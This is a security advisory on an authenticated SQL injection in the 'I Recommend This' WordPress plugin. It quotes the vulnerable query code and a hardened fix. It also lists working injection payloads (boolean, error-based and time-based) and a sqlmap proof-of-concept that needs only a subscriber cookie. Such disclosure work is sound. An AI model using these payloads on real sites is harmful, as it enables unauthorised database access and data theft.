I Recommend This <= v3.7.7 - Authenticated SQL Injection

Description
Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it."
Active installs (according to https://wordpress.org/plugins/i-recommend-this/): 40.000+

It is possible to inject SQL through the id attribute of the [dot_recommends] shortcode when the unique-IP check is enabled (the default setting). A low-privileged account is sufficient; a subscriber is enough. The impact is far worse when WordPress debug mode (WP_DEBUG) is active, because database errors are then returned to the client and error-based injection becomes possible (see Vulnerabilities).

dot-irecommendthis.php:65

add_shortcode( 'dot_recommends', array( &$this, 'shortcode' ) );


dot-irecommendthis.php:559-564

function shortcode( $atts )
{
	extract( shortcode_atts( array('id' => null), $atts ) );
	return $this->dot_recommend($id);

}	//shortcode


dot-irecommendthis.php:587-590 (function dot_recommend($id))

if( $options['disable_unique_ip'] != '1' ) {

	// Both $post_ID (derived from the shortcode's id attribute) and $ip are interpolated
	// directly into the query string; nothing is cast or passed through $wpdb->prepare().
	$voteStatusByIp = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."irecommendthis_votes WHERE post_id = '$post_ID' AND ip = '$ip'");
}

This great article (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) explains how shortcodes can be rendered by any authenticated user through the admin-ajax.php parse-media-shortcode action, and therefore why this works.
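A hardened version of the same lookup, added here as an example and not taken from the plugin: the shortcode id is coerced to an integer before use and both values go through $wpdb->prepare() instead of being interpolated. It assumes a WordPress runtime (shortcode_atts(), absint() and the global $wpdb are WordPress APIs); the function names and the "_hardened" suffix are hypothetical.

```php
<?php
// Added example, not plugin code. Assumes WordPress is loaded: $wpdb,
// shortcode_atts() and absint() are WordPress APIs. Function names are hypothetical.

// Shortcode handler: the id attribute is cast to a non-negative integer, so a
// value such as 2' AND (SELECT ...)-- becomes plain 2 before it reaches the query.
function dot_recommends_shortcode_hardened( $atts ) {
	$atts    = shortcode_atts( array( 'id' => 0 ), $atts, 'dot_recommends' );
	$post_id = absint( $atts['id'] );
	if ( 0 === $post_id ) {
		return ''; // no usable post id: render nothing instead of querying
	}
	return (string) count_votes_by_ip_hardened( $post_id, dot_client_ip_hardened() );
}

// Vote lookup with placeholders. %d forces an integer and %s is quoted and
// escaped by $wpdb->prepare(), so neither value can close the WHERE clause.
function count_votes_by_ip_hardened( $post_id, $ip ) {
	global $wpdb;
	$sql = $wpdb->prepare(
		"SELECT COUNT(*) FROM {$wpdb->prefix}irecommendthis_votes WHERE post_id = %d AND ip = %s",
		$post_id,
		$ip
	);
	return (int) $wpdb->get_var( $sql );
}

// Client address, validated as defence in depth: only a syntactically valid IP
// is ever passed to the query, even though the %s placeholder already escapes it.
function dot_client_ip_hardened() {
	$ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
	return filter_var( $ip, FILTER_VALIDATE_IP ) ? $ip : '0.0.0.0';
}
```

Independently of the query fix, keeping WP_DEBUG disabled on production sites removes the error messages that turn a blind injection into an error-based one.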

Vulnerabilities:

If WP_DEBUG is set to true:

    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: shortcode=[dot_recommends id="2' RLIKE (SELECT (CASE WHEN (5258=5258) THEN 0x73686f7274636f64653d5b646f745f7265636f6d6d656e64732069643d22325f5f424f554e4445445f494e4a454354494f4e5f4d41524b5f5f225d26616374696f6e3d70617273652d6d656469612d73686f7274636f6465 ELSE 0x28 END))-- ZKlm"]&action=parse-media-shortcode

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: shortcode=[dot_recommends id="2' AND EXTRACTVALUE(2988,CONCAT(0x5c,0x716a766a71,(SELECT (ELT(2988=2988,1))),0x7162707a71))-- LCIV"]&action=parse-media-shortcode

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELECT(SLEEP(5)))BQPZ)-- NVfD"]&action=parse-media-shortcode

If WP_DEBUG is set to false (should be the most common scenario):

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELECT(SLEEP(5)))NxWj)-- JHJu"]&action=parse-media-shortcode
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Proof of Concept
python sqlmap.py -u "http://wordpress.app/wp-admin/admin-ajax.php" --cookie "[insert cookie of a wordpress account, even if it's just a subscriber]" --data="shortcode=[dot_recommends id=\"2*\"]&action=parse-media-shortcode" -p action --level 5 --dbms=mysql

Affects Plugin

References

URL https://wordpress.org/plugins/i-recommend-this/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Verified No
WPVDB ID 8887

Timeline

Publicly Published 2017-08-14 (about 1 month ago)
Added 2017-08-16 (about 1 month ago)
Last Updated 2017-08-16 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.